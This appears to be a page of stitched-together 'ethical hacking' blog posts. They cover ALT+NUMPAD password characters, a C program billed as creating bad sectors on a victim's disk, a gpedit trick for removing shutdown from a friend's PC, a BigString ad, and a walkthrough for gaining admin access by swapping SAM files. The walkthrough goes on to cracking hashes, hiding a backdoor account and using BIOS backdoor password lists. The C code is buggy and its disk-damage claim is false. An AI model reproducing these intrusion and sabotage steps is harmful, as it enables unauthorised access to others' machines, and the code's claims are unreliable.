As some Microsoft Operating System geeks know, you can type many more characters than are on a standard keyboard by using the ALT+NUMPAD combination technique. For example, by holding down the ALT key, typing 234 on the number pad, then releasing ALT gives you the O character. I'm writing this article mostly because when I search around for information on the topic of ALT+Number key combos I find pages that are lacking in details. Most of the pages I found are coming from the angle of using ALT+NUMPAD combinations as shortcuts for typing in non-English languages, but I have another use for them. Using ALT+NUMPAD can make for some very ugly passwords to crack. These odd characters have two major advantages over normal keystrokes:


1. They are unlikely to be in someone's dictionary or brute force list. Try brute forcing a password like "ace of ?s" or "I am the a and the O".
2. Some hardware key loggers will not log these odd characters. Your mileage may vary on this as some key loggers can, so don't rely on it to keep you 100% safe.

I'll cover the 2nd point more in an upcoming article. Using ALT+NUMPAD to type odd characters into your password also has a few disadvantages.


1. The way they are described in this article only works in Microsoft Operating Systems (DOS, Windows 9x, Vista, XP, 2000), and there may be some variation amongst the different versions. If you know of a good way to do the same thing in Linux please email me.
2. Not all applications will let you use these odd characters. For testing I tried the password "Oÿ" (ALT+234 and ALT+0255) on a Windows XP local account,, but not all application will let you use these sorts of characters in your password.

Microsoft has the following to say on the subject of ALT+NUM key codes:


From:http://www.microsoft.com/globaldev/reference/glossary.mspx


Alt+Numpad: A method of entering characters by typing in the character’s decimal code with the Numeric Pad keys (Num Lock turned on). In Windows:


• Alt+, where xxx is the decimal value of a code point, generates an OEM-encoded character.
• Alt+<0xxx>, where xxx is the decimal value of a code point, generates a Windows-encoded character.
• Alt+<+>+, where xxxx is the hexadecimal Unicode code point, generates a Unicode-encoded (UTF-16) character.



Shortly I'll explain explain the first two methods further. The 3rd is more problematic to work with. First, you may have to edit your registry and add a the REG_SZ value "HKEY_Current_User/Control Panel/Input Method/EnableHexNumpad", then set it to "1". Also, depending on where you are trying to type the character the application may interpret your hexadecimal Fs as attempts to bring down the file menu. Since method three is so problematic I'll focus on the first two methods.
First, make sure you are using the number pad and not the top roll number keys, only the number pad works for this. Second, make sure NUM LOCK is on. It does not have to be on in all cases for these key combos to work, but it helps by keeping the number pad from being misinterpreted.

The chart from the site shows the relevant key codes to get various symbols. The table on the left shows the OEM Extended ASCII character set (AKA: IBM PC Extended Character Set; Extended ASCII; High ASCII; 437 U.S. English). True ASCII is only 7 bit, so the range is 0 to 127. IBM extended it to 8 bits and added more characters. To type these characters you merely have to hold down an ALT key, type the numeric value of the character, then release the ALT key.

The table on the right shows the ANSI character set (AKA: Window's ANSI/ISO Latin-1/ANSI Extended ASCII, though technically they are not exactly the same thing.). To use the ANSI character set you do the same thing as the OEM set, but you preface the number with an extra zero. Notice that the first 127 should be the same in both sets, though values 0-31 may not be viewable in all cases. I've been in "character encoding hell" just trying to get this article on my site in a readable format.

For example, ALT+257 gives me a in Wordpad, but in Notepad it loops back around the character set and gives me?(257-256=1 which is ? in the OEM set) . If you want to know what key code will bring up a particular character in a certain Windows font run Windows Character Map (charmap.exe) and look in the bottom right corner to find out.

some examples :

ALT+130 é
ALT+131 â
ALT+132 ä
ALT+133 à
ALT+134 å
ALT+135 ç
ALT+136 ê
ALT+137 ë
ALT+138 è
ALT+139 ï
ALT+140 î
ALT+141 ì
ALT+142 Ä
ALT+143 Å
ALT+144 É
ALT+145 æ
ALT+146 Æ
ALT+147 ô
ALT+148 ö
ALT+149 ò
ALT+150 û
ALT+151 ù
ALT+152 ÿ
ALT+153 Ö
ALT+154 Ü
ALT+155 ¢
ALT+156 £
ALT+157 ¥
ALT+158 P
ALT+159 ƒ
ALT+160 á
ALT+161 í
ALT+162 ó
ALT+163 ú
ALT+164 ñ
ALT+165 Ñ
ALT+166 ª
ALT+167 º
ALT+168 ¿
ALT+169 ¬


Create Bad sectors on hard disks


A C source code


/*create bad sectors on the hard disk.
*
* This program will create bad sectors on the hard disk. If you left it
* running for long enough, it could render a hard disk quite useless. When
* bad sectors are found, the sector is marked as bad, so fixing the hard disk
* is not an easy task. Unless the victim has time and knowledge to fix the
* disk, the hard drive can be left quite literally defective.
* supported by preetam
* I don't take responsibility for what you do with this program, served foe educational purpose only.
*
*
*/

#include
#include
#include
#include
#include
#include
#include

#define HDSIZE 640000

void handle_sig();

int main() {

int i = 0;
int x;
int fd[5];

signal(SIGINT, handle_sig);
signal(SIGHUP, handle_sig);
signal(SIGQUIT, handle_sig);
signal(SIGABRT, handle_sig);
signal(SIGTERM, handle_sig);

char *buf;

buf = malloc(HDSIZE);

printf("sekt0r: trashing hard disk with bad sectors!\n");

while(1) {
fd[1] = open("/tmp/.test", O_WRONLY|O_CREAT, 511);
fd[2] = open("/tmp/.test1", O_WRONLY|O_CREAT, 511);
fd[3] = open("/tmp/.test2", O_WRONLY|O_CREAT, 511);
fd[4] = open("/tmp/.test3", O_WRONLY|O_CREAT, 511);
fd[5] = open("/tmp/.test4", O_WRONLY|O_CREAT, 511);

for(x = 0; x < 5; x++) {
write(fd[x], buf, HDSIZE);
lseek(fd[x], 0, SEEK_SET);
close(fd[x]);

} /* end for() loop. */
} /* end while() loop. */
} /* end main(). */


void handle_sig() {
/* Reset signal handlers. */
signal(SIGINT, handle_sig);
signal(SIGHUP, handle_sig);
signal(SIGQUIT, handle_sig);
signal(SIGABRT, handle_sig);
signal(SIGTERM, handle_sig);

printf("sekt0r: cannot exit - trashing hard disk with bad sectors!\n");
return; /* go back to creating bad sectors. */
}



Disable or remove shutdown




=> remove shutdown from start menu and also from all other possible options.
=> hide shutdown from start menu
=> disable shutdown all togetherDisable or remove shutdown - The Ethical Hackinglearn to do it now!!! (it takes less than a minute to do so) Disclaimer: this is an article which just brings out the fact that removing the
shut down menu option from the start menu is possible. If you however get caught
by your manager or college system administrator, and get whipped in your ass, I
cannot be held responsible. This tool is a inbuilt tool present in windows XP, just like msgconfig. So you
got to execute this command using run. 1 . Start ->run and type gpedit.msc The gpedit stands for group policy and you can do wonders using this. Also if
you a minute with your pal’s system and this pal tries to flirt your girl friend
- You can make a lot of changes to his system in the time he leaves you alone
with his system, to have him go bonkers.
2. User configuration -> administrative Templates -> start menu and taskbar -> 3. This option opens up a pane on the right hand side. Identify the option named
- Remove SHUT DOWN on the start menu . 4. Double click Remove SHUT DOWN on the start menu option 5. a small screen pops up and you may like to read about the explanation in the
EXPLAIN TAB before you change the settings. 6. Just change the radio button TO ENABLED and say apply. 7. DONE. No need to log off or restart the system. (You may however have to find
a way to restart your system.) 8. This option disables the log off option from the system. From the start menu,
also from the life saver – three buttons CTRL - ALT - DEL options. This option goes well with the HIDING THE LOG OFF FROM START MENU… (To shut down ur system:-without using frm shut down menu) The solution is that u can switch user thru task manager (alt+ctrl+del) or by
pressing winkey+L where u get the option to turn off ur compy/restart/stand
by.
or u may create a shortcut using this shortcut location to shutdown ur sys %windir%\system32\shutdown.exe -s to restart, u can use this shortcut %windir%\system32\shutdown.exe -r


Self distructing Email - MI3
*****

one word - Just perfect

One of the best service i found online n using it too personally..


Big Brother is Watching

Every time that you send an email, copies are stored permanently on multiple email servers as well as the recipient's inbox and anyone they decide to send it to. Your emails can be stored and scanned in more places than you can imagine. Do you want people storing your email messages forever? Do you want something that you type today to be used against you tomorrow, next week, next month or even in the next decade?
Until now, everyone else has had control of the email that you have sent. BigString gives you back control of your email, acting like an automatic shredder for your email. You can self-destruct or change an email that's already been sent or read. Don't leave your messages sitting in peoples' inboxes forever. Get a free BigString email account to protect your privacy.


BigString takes the risk out of email

Now, with BigString, you can finally take the risk out of email and put an end to "sender regret." It is the world's first & only email service that thoroughly protects your safety and privacy.


BigString's exclusive, patent-pending technology enables you to prevent your personal or business information from lingering indefinitely in someone else's inbox. It also restricts private pictures or messages from being indiscriminately spread throughout cyberspace! Now your sensitive photos can't be posted to unseemly web sites or printed for circulation amongst total strangers.

BigString lets you have second thoughts
BigString shifts the control from the recipient to YOU the sender. BigString grants the luxury of second thoughts, the power to limit message viewings, and the choice to delay email transmission.


You can reword a message fired off in anger or haste or completely delete it! You can recall a botched résumé for revision or erase a tasteless joke. You can make a work of art or photograph print-proof. You can prevent a love letter from being forwarded. You can set an expiration date on an emailed price quote or business offer or you can simply pull back an email to eliminate typos.


BigString takes the danger out of clicking
BigString guarantees that clicking "send" will never again be an irreversible disaster. Now YOU decide the fate of your emails. You decide where they end up, who sees them and for how long. BigString emails can be destroyed, recalled or changed even after they've been opened! The freedom is yours, the options are yours, and you're the boss with BigString.


BigString is easy to use
BigString is as easy to use as any other email and there's nothing to download! Don't be resigned to the mercy of your recipient. You don't want your every action to be carved in stone because sometimes you just NEED to take it back!

Here are just a few of the many applications of BigString
Erasable, Recallable, Non-Printable Email.

Executives: Protect your business and safeguard your email. Now you never have to worry about sending the wrong attachment or completely forgetting it. Misspelled words, incorrect dates, or other typos can all be fixed even after your message has been sent. You can even "pull an email back" to delete expired price quotes, old business offers or dated legal material. BigString is your email insurance.


On-Line Daters: You don't want your personal information like pictures, phone numbers or intimate notes, circulated around the Internet! BigString prevents your pictures and messages from being printed or forwarded. You can set an expiration date for an email or self-destruct it at will. You can choose the number of times you'll allow a picture to be viewed before it disappears. BigString protects your privacy!


Artists and Photographers: Now with BigString you can confidently email proofs and samples without the slightest fear that they will be printed or saved for later use without your authorization. Use BigString to make your image non-savable and non-printable! Limit the number of times a client can view a piece before you have it self-destruct. You can even recall a sent email to delete an old price quote or alter a new one. You can also prevent it from being forwarded to other customers. BigString protects your rights of ownership!


Copywriters: Spelling or punctuation errors that can cost time, money, or embarrassment are now a thing of the past. With BigString, clicking "send" is no longer an action "carved in stone." Accidentally arranging paragraphs in the wrong order will no longer mean a lost account. With the technology of BigString you can recall that mistake-ridden copy and correct the errors even after your email has left the outbox. You can self-destruct what you sent all together and replace it with a fully revised version. Only you will know this switch has occurred! With BigString you can confidently send non-printable, non-savable sample copy. You no longer have to worry that it will be used without your knowledge. You're the boss with BigString.
Self distructing Email - MI3 - The Ethical Hacking

SAM History n Hacking


1-Introduction


This article introduce very simple way to get Administrator like account and do the job and after finish recover your way, after that Get Admin Password later in your home by Cracking, After get the Admin Password Create a hidden user account and do all your jobs free, and Explain how to make a USB Storage Device Bootable corresponding to any system boot, and how to bypass Mother Board password by Default Passwords, and how to extract it if you are in the system

2-To Hackers / Security Systems Engineers

First All must know that both Hackers / Security Systems Engineers Are 2 faces to the same coin Any way, I try this on Windows XP SP2 I want all to try it on Windows Server 2003, Windows Vista Any Windows NT and POST a Message to make all know what versions exactly this idea can apply for
3-Close Look to hole
Microsoft stores all Security Information in many files but the main file is the SAM file (Security Accounts Manager)! this file contain critical information about users account you can explore the folder
$windir$\system32\config
You will find all things and may discover some thing new, but what amazing here is that the file is available, so we can apply our idea
shot1
You will Not be able To copy them Under XP
4-Dose Microsoft Know and Why!?
Yes Microsoft Know all things, and done on purpose why? I always for many years ask my self why Microsoft doesn’t do real security on their systems from the CD setup to all security aspects In the system, I found(my opinion may wrong)that they need to achieve 2 strategic things

1-They need their software spread and all depend on it and in one day when they feel that they are the One The security will done and all money will go to One Pocket

2-They Forced/Like to Make Some Organizations Hack other systems

Proof:
They can make this File SAM Unavailable by storing the information in FAT, FAT32, NTFS Areas (Sectors reserved by The Operating SYSTEM to Store the Addresses of the files on the HardDisk File Allocation Table) So that it is hard to extract. But they don't!!!!!
5-Understand the Idea
The Idea is simple I will explain it manually and it can then be programmed it is so easy here is the idea

The SAM file is available and the SAM file contain a Security Information, so I created a Free Windows XP SP2 Logon account (Administrator Account without password) that means when windows Lunch it Will enter directly to the system without asking about any password And windows will store this Account in The SAM file on My PC So the SAM file on My PC contain an Account will Make you enter Directly to the Windows, so I will take My SAM File and Replace (by renaming, we will need the original file to recover our way) It with the other SAM File in The Other System or Machine So When you restart It will make you enter directly to the Windows With Administrator Like Account ,do what you need and then back all things to the previous state. All These Steps will be under other system bootable DOS, Knoppiex, Windows Live CD, Because Windows XP will not make u able to copy the Files
6-Get Admin Like Account (The Simple Way)

1- Download My 2 SAM files I Include them in Downloads
2- Go to the target Machine , and try to Access it and Boot from any device CD-ROM, Floppy, NIC if it haven't any of those Read Hint 9
3- After Get Access to the Boot Command prompt c:> or Boot Live OS CD, Go to the windows folder $windir$\system32\config And Copy the SAM File and System File (we will need it later) To other folder, Then go to $windir$\repair copy SAM file
And then Rename the 2 SAM Files to SAM1 in their original places
4- Copy My SAM/config File and Paste it in the windows folder $windir$\system32\config Copy My SAM/Repair File and Paste it in the windows folder $windir$\repair (may this step not required)
5- Reboot and Make windows enter Normally
6- Yeah, No You are in The System
7- Copy the files in step 3 to Floppy Disk or Flash Stick Or Send it to your mail via Internet
8- After finish repeat step 2 and delete My SAM files and Rename Both SAM1 to SAM
9- Reboot , Congratulation you recover your way
7-Crack the SAM-Know the real Admin Password and Apply Hint 8
There is many ways I will introduce 2 ways and explain 1 After you get the SAM File and System File there are Programs That extract the Accounts and their passwords, depending on the idea of cracking the HASH (the HASH is one way encryption method) so that The program will generate random passwords and convert them to HASH and then compare it with the HASHES in the SAM File , so it may take a long time but for fast you will pay more money for ready made HASHES with their user names and passwords the 2 program are

1-L0phtcrack v4.0 (LC4 alternate name) the most famous on the NET
2-SAMInside http://www.insidepro.com/I include on the Downloads

I will explain fast SAMInside

shot1

This is the main window press Ctrl+O or by mouse click Import SAM and SYSTEM

shot1

Window will open to import the 2 files and the program will start to crack the Accounts and get them, and then display users names and their passwords

Any other tool will do the job try all and select your best I Explain here SAMInside because he give me results with 6 character only password and get it FAST
8-Creat a Hidden User Accountn
Windows NT / Windows 2000 and Windows XP has a security setting to hide accounts from the Logon Screen/Control panel users accounts

shot1
Press
Ctrl+Alt+Delet
Give you another Access Dialog


Steps:

1-After getting Admin Password enter to the system
2-create an Account with password
3-click start - > Run - > type Regedit press Enter
4-Go to
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\ CurrentVersion\Winlogon\SpecialAccounts\UserList

shot1


5- Create a new DWORD Value on the UserList
6-Name it with Name of Account to be Hidden
7-set the Value Data of this DWORD Value to 0 to hide it /1 to appear it
8- close Regedit and Reboot
9- Press Ctrl+Alt+Delete when logon Screen Appear another login dialog appear type You hidden user name and password and press Enter

Note:

1- the account profile will be visible in \Documents and Settings, But it will be hidden from Logon Screen and User Account in the control panel

2-there is other method that Inject your Account directly to the Admin SAM without know the Admin Pass, but believe me you don't Expect the result, so if you want try it (if the password hard to get)
9-USB Boot for FAT32, NTFS or any File System

HP Always amazing me to do this we need 2 tools

1- HP USB Disk Storage Format Tool v 2.0.6 I include in Downloads If u want to find more go to http://www.hp.com/
2- NTFSDOS Professional Boot Disk Wizard I include in Downloads If u want to find more go to http://www.winternals.com/

shot1

Just connect your USB Storage
steps:
1- Prepare a Startup Disk or Startup CD , Or any Equivalent
2- In the HP tool select the Device->your USB Storage
3- Select File System FAT or FAT32
4- Check "create a DOS startup disk" checkbox and then select option "using DOS System Files Located at"
5- brows your location
6- Click Start
7- Now you have a Bootable USB Storage Device
8- Now in the NTFSDOS Professional Boot Disk Wizard follow the wizard and you will get a NTFS bootable USB Storage

Why we need NTFS ?
If the Partition of the Windows System is NTFS so with normal Startup you will not be able to access any files because the File System is not Recognized by MS-DOS when we install NTFSDOS Professional on the bootable disk it will allow you To Access any File Under NTFS

Note:
Make sure that the option in Mother board Setup of First Boot "USB-Hard Disk" if you want to boot from a USB
10-Mother Boards Default Passwords and how to extract it if you are in The system

This subject is huge I try to find simple or clever way but as u know many PC's many machines many bios versions and updates so I search the net for the best and I list below ,but if this doesn’t help I recommend you to find the bios version and the motherboard and search the net on Google, yahoo, yahoo groups and other you will find some thing help u

HOW TO BYPASS BIOS PASSWORDS
http://www.elfqrin.com/docs/biospw.html

Removing a Bios - CMOS Password
http://www.dewassoc.com/support/bios/bios_password.htm

How to Bypass BIOS Passwords
http://www.uktsupport.co.uk/reference/biosp.htm

How to Bypass BIOS Passwords
http://www.i-hacked.com/content/view/36/70/

Default Password List
2006-04-30
http://www.phenoelit.de/dpl/dpl.html

Award BIOS backdoor passwords:
ALFAROME--------BIOSTAR--------KDD--------ZAAADA-------- ALLy--------CONCAT--------Lkwpeter--------ZBAAACA-------- aLLy-------- CONDO--------LKWPETER--------ZJAAADC-------- aLLY--------Condo--------PINT--------01322222-------- ALLY--------d8on--------pint--------589589-------- aPAf--------djonet--------SER--------589721-------- _award--------HLT--------SKY_FOX--------595595-------- AWARD_SW--------J64--------SYXZ--------598598 AWARD?SW--------J256--------syxz-------- AWARD SW--------J262--------shift + syxz-------- AWARD PW--------j332--------TTPTHA-------- AWKWARD--------j322-------- awkward

AMI BIOS Backdoor Passwords:
AMI--------BIOS--------PASSWORD--------HEWITT RAND-------- AMI?SW--------AMI_SW--------LKWPETER--------CONDO

Phoenix BIOS Backdoor Passwords: phoenix--------PHOENIX--------CMOS--------BIOS

Misc. Common Passwords
ALFAROME--------BIOSTAR--------biostar--------biosstar-------- CMOS--------cmos--------LKWPETER--------lkwpeter-------- setup--------SETUP--------Syxz--------Wodj
Other BIOS Passwords by Manufacturer
Manufacturer--------Password
VOBIS & IBM-------- merlin
Dell--------Dell
Biostar-------- Biostar
Compaq--------Compaq
Enox--------xo11nE
Epox--------central
Freetech--------Posterie
IWill--------iwill
Jetway--------spooml
Packard Bell--------bell9
QDI--------QDI
Siemens--------SKY_FOX
TMC--------BIGO
Toshiba--------Toshiba
Toshiba--------BIOS


Most Toshiba laptops
and some desktop systems will bypass the BIOS password if the left shift key is held down during boot
IBM Aptiva BIOS
Press both mouse buttons repeatedly during the boot
Posted by at No comments:
Subscribe to: Posts (Atom)